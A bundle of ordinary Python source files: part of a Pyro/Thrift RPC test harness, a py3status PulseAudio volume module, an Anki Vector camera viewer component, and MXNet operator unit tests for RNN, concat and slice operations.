print "Starting Pyro Testing..."
test_client(client)
client.close()
except pyro.ClientException as tx:
print 'Client exception encountered: ' + tx.message
server.daemon.shutdown()
def test_thrift():
from automaton.server.thrift import ThriftServer
import automaton.client.thrift as thrift
print "Starting Thrift Server"
server = ThriftServer(port = 9091)
server.initialize()
thread = threading.Thread(target=server.start)
thread.daemon = True
thread.start()
time.sleep(3) # wait for server to initialize
try:
client = thrift.ClientWrapper(appname="testharness",port=9091)
client.open()
print "Starting Thrift Testing..."
test_client(client)
client.close()
except thrift.ClientException as tx:
print 'Client exception encountered: ' + tx.message
if __name__ == "__main__":
#test_server()
#test_pyro()
test_thrift()
|
volume_pa_status.py
|
# -*- coding: utf-8 -*-
"""
Pulse Audio Volume control.
@author <Vlad Vasiliu> <vladvasiliu@yahoo.fr>
@license BSD
"""
from __future__ import annotations
import logging
import math
from dataclasses import dataclass
import threading
from typing import Callable, Iterable, Optional, Union
from pulsectl import Pulse, PulseEventMaskEnum, PulseEventTypeEnum, PulseEventFacilityEnum, PulseSinkInfo, \
PulseDisconnected, PulseLoopStop
from py3status.composite import Composite
from py3status.py3 import Py3
logger = logging.getLogger("main")
logging.basicConfig(level=logging.DEBUG)
@dataclass(frozen=True)
class Volume:
"""Holds normalized (integer) volume and mute status
The volume will be displayed as an integer. The output will only be updated if the value changes.
Therefore we do the conversion here so as to avoid "false positives" due to float comparisons.
As the sink returns a volume level per channel, which is basically a list of values,
those values must be aggregated into a single value.
By default `max` is called, but this can be replaced with any function that takes an iterable of floats and returns
a float.
Volume is a positive integer:
* 0: No sound
* 100: 100% hardware level
* >100: software amplification
See PulseAudio documentation for volume levels (https://freedesktop.org/software/pulseaudio/doxygen/volume.html).
"""
level: int
mute: bool
@classmethod
def from_sink_info(cls, sink_info: PulseSinkInfo, cmp: Callable[[Iterable], float] = max) -> Volume:
float_vol = cmp(sink_info.volume.values)
return cls(level=round(100 * float_vol), mute=bool(sink_info.mute))
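# Illustrative sketch (not part of the original module): any callable that reduces an
# iterable of floats to a single float can replace the default `max` aggregation,
# for example averaging the channel levels instead of taking the loudest one.
def _mean_channel_volume(sink_info: PulseSinkInfo) -> Volume:
    from statistics import mean  # stdlib average of the per-channel levels
    return Volume.from_sink_info(sink_info, cmp=mean)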
class Py3status:
py3: Py3
blocks = u"_▁▂▃▄▅▆▇█"
button_down = 5
button_mute = 1
button_up = 4
format = u"{icon} {percentage}%"
format_muted = u"{icon} {percentage}%"
is_input = False
max_volume = 100
thresholds = [(0, "good"), (75, "degraded"), (100, "bad")]
volume_delta = 5
def __init__(self, sink_name: Optional[str] = None, volume_boost: bool = False):
"""
:param sink_name: Sink name to use. Empty uses default sink
:param volume_boost: Whether to allow setting volume above 1.0 - uses software boost
"""
self._sink_name = sink_name
self._sink_info: Optional[PulseSinkInfo]
self._volume_boost = volume_boost
self._pulse_connector = Pulse('py3status-pulse-connector', threading_lock=True)
self._pulse_connector_lock = threading.Lock()
self._volume: Optional[Volume] = None
        self._backend_thread: Optional[threading.Thread] = None
def _get_volume_from_backend(self):
"""Get a new sink on every call.
        The sink object is not updated when the backend values change, so a fresh one is fetched each time.
Returned volume is the maximum of all available channels.
"""
sink_name = self._pulse_connector.server_info().default_sink_name
self._sink_info = self._pulse_connector.get_sink_by_name(sink_name)
pulse_volume = Volume.from_sink_info(self._sink_info)
logger.debug(pulse_volume)
if self._volume != pulse_volume:
self._volume = pulse_volume
self.py3.update()
def _callback(self, ev):
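        """Stop the pulsectl event loop when a relevant change event arrives.
        pulsectl delivers events to this callback from event_listen(); raising PulseLoopStop
        is how the callback makes event_listen() return, after which the reader thread
        refreshes the volume from the backend.
        """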
if ev.t == PulseEventTypeEnum.change and \
(ev.facility == PulseEventFacilityEnum.server or
ev.facility == PulseEventFacilityEnum.sink and ev.index == self._sink_info.index):
raise PulseLoopStop
def _pulse_reader(self):
while True:
try:
self._pulse_connector.event_listen()
self._get_volume_from_backend()
except PulseDisconnected:
logger.debug("Pulse disconnected. Stopping reader.")
break
def post_config_hook(self):
self._pulse_connector.connect()
self._get_volume_from_backend()
self._pulse_connector.event_mask_set(PulseEventMaskEnum.server, PulseEventMaskEnum.sink)
self._pulse_connector.event_callback_set(self._callback)
        self._backend_thread = threading.Thread(name="pulse_backend", target=self._pulse_reader)
        self._backend_thread.start()
def kill(self):
logger.info("Shutting down")
self._pulse_connector.disconnect()
def _color_for_output(self) -> str:
if self._volume is None:
return self.py3.COLOR_BAD
if self._volume.mute:
return self.py3.COLOR_MUTED or self.py3.COLOR_BAD
return self.py3.threshold_get_color(self._volume.level)
def _icon_for_output(self) -> str:
return self.blocks[
min(
len(self.blocks) - 1,
int(math.ceil(self._volume.level / 100 * (len(self.blocks) - 1))),
)
]
def _format_output(self) -> Union[str, Composite]:
return self.py3.safe_format(format_string=self.format_muted if self._volume.mute else self.format,
param_dict={"icon": self._icon_for_output(),
"percentage": self._volume.level})
def volume_status(self):
response = {
"cached_until": self.py3.CACHE_FOREVER,
"color": self._color_for_output(),
"full_text": self._format_output()
}
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
# with PulseController() as pc:
# pc.run()
#
# while True:
# sleep(10)
from py3status.module_test import module_test
module_test(Py3status)
|
viewer.py
|
# Copyright (c) 2018 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Displays camera feed from Vector's camera.
"""
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['ViewerComponent']
import asyncio
import multiprocessing as mp
import sys
try:
import cv2
except ImportError as exc:
sys.exit("Cannot import opencv-python: Do `pip3 install opencv-python` to install")
try:
import numpy as np
except ImportError as exc:
sys.exit("Cannot import numpy: Do `pip3 install numpy` to install")
try:
from PIL import Image
except ImportError:
sys.exit("Cannot import from PIL: Do `pip3 install --user Pillow` to install")
from . import util
class ViewerComponent(util.Component):
"""This component opens a window and renders the images obtained from Vector's camera.
This viewer window is run in a separate process spawned by :func:`~ViewerComponent.show_video`.
    Running in a separate process means that rendering the camera feed does not block the main
    thread of the calling code, and gives the viewer its own UI thread to operate on.
:func:`~ViewerComponent.stop_video` will stop the viewer process.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(enable_camera_feed=True, show_viewer=True) as robot:
time.sleep(5)
:param robot: A reference to the owner Robot object. (May be :class:`None`)
"""
def __init__(self, robot):
super().__init__(robot)
self.overlays: list = []
self._frame_queue: mp.Queue = None
self._loop: asyncio.BaseEventLoop = None
self._process = None
def show_video(self, timeout: float = 10.0) -> None:
"""Render a video stream using the images obtained from
Vector's camera feed.
Be sure to create your Robot object with the camera feed enabled
by using "show_viewer=True" and "enable_camera_feed=True".
.. testcode::
import anki_vector
import time
with anki_vector.Robot(enable_camera_feed=True) as robot:
robot.viewer.show_video()
time.sleep(10)
        :param timeout: The time (in seconds) to wait for a new frame before the viewer closes. (Pass ``None`` to wait forever.)
"""
ctx = mp.get_context('spawn')
self._frame_queue = ctx.Queue(maxsize=4)
self._process = ctx.Process(target=ViewerComponent._render_frames, args=(self._frame_queue, self.overlays, timeout), daemon=True)
self._process.start()
def stop_video(self) -> None:
"""Stop rendering video of Vector's camera feed and close the viewer process.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(show_viewer=True) as robot:
time.sleep(10)
robot.viewer.stop_video()
"""
if self._frame_queue:
self._frame_queue.put(None, False)
self._frame_queue = None
if self._process:
self._process.join(timeout=5)
self._process = None
def enqueue_frame(self, image: Image.Image):
"""Sends a frame to the viewer's rendering process. Sending `None` to the viewer
        will cause it to shut down gracefully.
.. note::
This function will be called automatically from the camera feed when the
:class:`~anki_vector.robot.Robot` object is created with ``enable_camera_feed=True``.
.. code-block:: python
import anki_vector
from PIL.Image import Image
image = Image()
with anki_vector.Robot(show_viewer=True) as robot:
robot.viewer.enqueue_frame(image)
:param image: A frame from Vector's camera.
"""
if self._frame_queue is not None:
try:
self._frame_queue.put(image, False)
except mp.queues.Full:
pass
    def _apply_overlays(self, image: Image.Image) -> Image.Image:
        """Apply all overlays attached to this viewer instance onto an image from the camera feed."""
for overlay in self.overlays:
overlay.apply_overlay(image)
return image
@staticmethod
def _render_frames(queue: mp.Queue, overlays: list = None, timeout: float = 10.0) -> None:
"""Rendering the frames in another process. This allows the UI to have the
main thread of its process while the user code continues to execute.
:param queue: A queue to send frames between main thread and other process.
:param overlays: overlays to be drawn on the images of the renderer.
:param timeout: The time without a new frame before the process will exit.
"""
window_name = "Vector Camera Feed"
cv2.namedWindow(window_name, cv2.WINDOW_NORMAL)
try:
image = queue.get(True, timeout=timeout)
while image:
if overlays:
for overlay in overlays:
overlay.apply_overlay(image)
image = cv2.cvtColor(np.array(image), cv2.COLOR_BGR2RGB)
cv2.imshow(window_name, image)
cv2.waitKey(1)
if cv2.getWindowProperty(window_name, cv2.WND_PROP_VISIBLE) < 1:
break
image = queue.get(True, timeout=timeout)
        except (TimeoutError, mp.queues.Empty):  # queue.get raises Empty when no frame arrives in time
pass
except KeyboardInterrupt:
pass
cv2.destroyWindow(window_name)
cv2.waitKey(1)
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import run_in_spawned_process, xfail_when_nonstandard_decimal_separator
import pytest
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
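    # Added note (not in the original test): this helper unrolls `cell1` (a fused RNN cell)
    # and `cell2` (an equivalent stacked cell) over the same (N, T, I) input, copies the
    # parameters from cell1's layout into cell2's, and then checks that forward outputs and
    # input gradients agree within rtol/atol for the requested grad_req.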
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if type(grad_req) is dict and grad_req['data'] == 'null' or grad_req == 'null':
assert(mod1.get_input_grads()[0] == None)
assert(mod2.get_input_grads()[0] == None)
else:
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_lstm_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_lstm_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
check_rnn_consistency(fused, stack, T, N, I, H, {'data': 'add', 'parameters': 'null'})
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_gru_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_gru_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnntanh_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnntanh_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnnrelu_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym.bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
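    # Subtracting the per-axis max before exponentiating avoids overflow in exp();
    # softmax is invariant to this shift, so the result is unchanged.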
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@with_seed()
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
